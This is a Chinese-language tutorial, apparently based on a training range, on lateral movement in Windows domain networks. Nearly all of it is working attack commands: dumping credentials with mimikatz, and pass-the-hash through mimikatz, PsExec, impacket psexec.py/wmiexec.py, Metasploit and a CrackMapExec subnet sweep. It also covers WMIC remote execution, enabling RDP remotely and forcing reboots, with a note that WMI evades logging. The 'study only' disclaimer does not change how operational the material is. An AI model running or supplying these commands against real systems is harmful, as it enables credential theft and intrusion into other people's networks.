Windows 内网渗透之横向渗透

横向渗透

本次实验环境靶场来自于暗月(moonsec)师傅，文中内容全由个人理解编制，若有错处，大佬勿喷，个人学艺不精；本文中提到的任何技术都源自于靶场练习，仅供学习参考，请勿利用文章内的相关技术从事非法测试，如因产生的一切不良后果与文章作者无关。

PTH(pass-the-hash) HASH 传递

pass-the-hash 在内网渗透中是一种很经典的攻击方式，原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务，而不用提供明文密码。

pass the hash 原理：

• 在 Windows 系统中，通常会使用 NTLM 身份认证

• NTLM 认证不使用明文口令，而是使用口令加密后的 hash 值，hash 值由系统 API 生成(例如 LsaLogonUser)

• hash 分为 LM hash 和 NT hash，如果密码长度大于 15，那么无法生成 LMhash。从 Windows Vista 和 Windows Server 2008 开始，微软默认禁用 LM hash

• 如果攻击者获得了 hash，就能够在身份验证的时候模拟该用户(即跳过调用API 生成 hash 的过程)

这类攻击适用于：

• 域/工作组环境
• 可以获得 hash，但是条件不允许对 hash 爆破
• 内网中存在和当前机器相同的密码

微软也对 pth 打过补丁，然而在测试中发现，在打了补丁后，常规的 Pass TheHash 已经无法成功，唯独默认的 Administrator(SID 500)账号例外，利用这个账号
仍可以进行 Pass The Hash 远程 ipc 连接。如果禁用了 ntlm 认证，PsExec 无法利用获得的 ntlm hash 进行远程连接，但是使用 mimikatz 还是可以攻击成功。从 windows 到 windows 横向 pth 这一类攻击方法比较广泛。

使用 mimitkaz 进行pth攻击

以下的实验环境为两台主机，一台为 Windows server 2008 r2， 一台为 Windows 10。

两台主机为一个域，2008为域控。

以管理员启动 mimitkaz 输入以下命令获取hash：

# 开启调试
privilege::debug
# 获取hash
sekurlsa::logonpasswords

# 下面的命令可以把hash保存出来
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> passwordhash.txt

得到 hash 后进行横向渗透

# 开启调试
privilege::debug

# 尝试横向渗透其他主机
sekurlsa::pth /user:MOONSEC\administrator /domain:08server-dc.moonsec.fbi /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0

使用 psexec 进行横向移动

psexec 是 windows 官方自带的，不会存在查杀问题，属于 pstools 利用 PsExec 可以在远程计算机上执行命令，其基本原理是通过管道在远程目标主机上创建一个psexec 服务，并在本地磁盘中生成一个名为 PSEXESVC 的二进制文件，然后通过psexec 服务运行命令，运行结束后删除服务。利用 SMB 服务可以通过明文或 hash 传递来远程执行，条件 445 服务端口开放。对方开放 445 端口，就相当于开放了 smb 协议

**psexec登录 第一种：**先有 ipc 链接，psexec 需要明文或 hash 传递

PsExec.exe /accepteula /s \\192.168.150.160 -u Administrator -p 123456 cmd

• -accepteula 第一次运行 PsExec 会弹出确认框，使用该参数就不会弹出确认框
• -s 以 System 权限运行远程进程，如果不用这个参数，就会获得一个对应用户权限的 shell直接直接执行回显
• -u 域\用户名
• -p 密码

也可以使用下面的命令直接执行命令不反弹shell

PsExec.exe /accepteula /s \\192.168.150.160 -u Administrator -p 123456 cmd /c "ipconfig"

**psexec登录 第二种：**不知道明文密码，但是知道我们要登录的主机的hash，使用hash进行登录（可以用作权限维持）

PsExec.exe -hashes aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 ./Administrator@192.168.150.160

个人测试发现使用 PsExec.exe 进行hash传递会失败，这里建议使用 psexec的python版本进行hash传递。

python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 ./Administrator@192.168.150.160

在使用 PsExec 时需要注意以下几点：

• 需要远程系统开启 admin$ 共享（默认是开启的）
• 因为 PsExec 连接的原理是基于 IPC 共享，因此目标需要开放 445 端口
• 在使用 IPC$ 连接目标系统后，不需要输入账户和密码。
• 在使用 PsExec 执行远程命令时，会在目标系统中创建一个 psexec 的服务，命令执行完后，psexec 服务将被自动删除。由于创建或删除服务时会产生大量的日志，因此蓝队在溯源时可以通过日志反推攻击流程。
• 使用 PsExec 可以直接获得 System 权限的交互式 Shell 的前提目标是administrator 权限的 shell
• 在域环境测试时发现，非域用户无法利用内存中的票据使用 PsExec 功能，只能依靠账号和密码进行传递。（有可能是psexec.exe 不行使用psexec.py可以）

在我们知道域管理员的在账号和密码后，我们可以登陆域管理，使用以下命令：

python3 psexec.py moonsec/Administrator@192.168.150.160
# 输入密码

# 登陆其他主机管理员
psexec.exe /accepteula /s \\192.168.150.161 -u Administrator -p 123456 cmd

使用 msf hash 进行横向渗透

use exploit/windows/smb/psexec
set SMBUser Administrator
set rhosts 192.168.150.160
set smbpass aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
run

使用 CrackMapExec 进行批量横向渗透

CrackMapExec 可以对 C 段中的主机进行批量 pth

项目下载地址：https://github.com/byt3bl33d3r/CrackMapExec.git

使用命令：

crackmapexec smb 192.168.150.0/24 -u administrator -H 32ed87bdb5fdc5e9cba88547376818d4

对 192.168.150.0/24 C 段进行批量 pass the hash

使用 WMI命令 进行横向渗透

WMI 全称 Windows Management Instrumentation 即 Windows 管理工具，Windows 98 以后的操作系统都支持 WMI。由于 Windows 默认不会将 WMI 的操作记录在日志里，同时现在越来越多的杀软将PsExec 加入了黑名单，因此 WMI 比 PsExec 隐蔽性要更好一些。

wmic 命令

WMI 连接远程主机，并使用目标系统的 cmd.exe 执行命令，将执行结果保存在目标主机 C 盘的 ip.txt 文件中

使用 WMIC 连接远程主机，需要目标主机开放 135 和 445 端口( 135 端⼝是 WMIC 默认的管理端⼝，wimcexec 使⽤445 端⼝传回显)

# 执行命令并保存在C盘
wmic /node:192.168.150.160 /user:administrator /password:123456 process call create "cmd.exe /c ipconfig > c:\ip.txt"

之后建立 IPC$ ，使用 type 读取执行结果

# 建立IPC$
net use \\192.168.150.160\ipc$ "123456" /user:administrator
# 读取结果
type \\192.168.150.160\c$\ip.txt

使用 wmiexec.py 脚本获取shell

在 impacket 工具包里有 wmiexec.py 脚本，可以用来直接获取 shell其他攻击手法可以看下 readme.md，这里只简单的对 pth 做一下实验：

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 Administrator@192.168.150.160 "whoami"

wmiexec.py 的 hash 参数格式为 LM Hash:NT Hash这个部分00000000000000000000000000000000 可以随便填写

wmiexec.py 明文密码获取 shell

python3 wmiexec.py administrator:123456@192.168.150.160

使用 wmiexec.vbs 脚本获取shell

wmiexec.vbs 脚本通过 VBS 调用 WMI 来模拟 PsExec 的功能，wmiexec.vbs 下载地址：

https://github.com/k8gege/K8tools/blob/master/wmiexec.vbs

cscript //nologo wmiexec.vbs /shell 192.168.150.160 administrator 123456

使用 vmiexec.vbs 执行单条命令

cscript wmiexec.vbs /cmd 192.168.150.160 administrator 123456 "ipconfig"

wmic 的其他命令

使用 wmic 远程开启目标的 RDP

# 适于 Windows xp、server 2003
wmic /node:192.168.7.7 /user:administrator /password:123456 PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1

# 适于 Windows 7、8、10，server 2008、2012、2016，注意 ServerName 需要改为目标的 hostname
wmic /node:192.168.0.123 /user:administrator /password:123456 RDTOGGLEWHERE ServerName='计算机名' call SetAllowTSConnections 1

或者
wmic /node:192.168.0.123 /user:administrator /password:123456 process call create 'cmd.exe /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'

判断 RDP 是否开启

如果返回 0 表示开启，返回 1 表示关闭

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections

远程重启电脑

wmic /node:192.168.0.141 /user:administrator /password:123456 process call create "shutdown.exe -r -f -t 0"

Invoke-WmiCommand

Invoke-WmiCommand.ps1 是 PowerSploit 工具包里的一部分，该脚本是利用Powershell 调用 WMI 来远程执行命令。

在 Powershell 中运行以下命令

# 导入 Invoke-WmiCommand.ps1 脚本
Import-Module .\Invoke-WmiCommand.ps1

# 指定目标系统用户名
$User = ".\administrator"

# 指定目标系统的密码
$Password = ConvertTo-SecureString -String "123456" -AsPlainText -Force

# 将账号和密码整合起来，以便导入 Credential
$Cred = New-Object -TypeName System.Management.Automation.PSCredential-ArgumentList $User,$Password

# 指定要执行的命令和目标 IP
$Remote = Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -ComputerName 192.168.150.160

# 将执行结果输出到屏幕上
$Remote.PayloadOutput

如果遇到无法导入模块以管理员身份打开PowerShell ，使用以下命令：

set-executionpolicy remotesigned

Invoke-WMIMethod

Invoke-WMIMethod 是 PowerShell 自带的一个模块，也可以用它来连接远程计算机执行命令和指定程序。

# 指定目标系统用户名
$User=".\administrator"

# 指定目标系统密码
$Password=ConvertTo-SecureString -String "123456" -AsPlainText -Force

# 将账号和密码整合起来，以便导入 Credential 中
$Cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User,$Password

# 在远程系统中运行 calc.exe 命令
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName "192.168.150.160" -Credential $Cred

我们可以看到在目标主机上已经运行了计算器的程序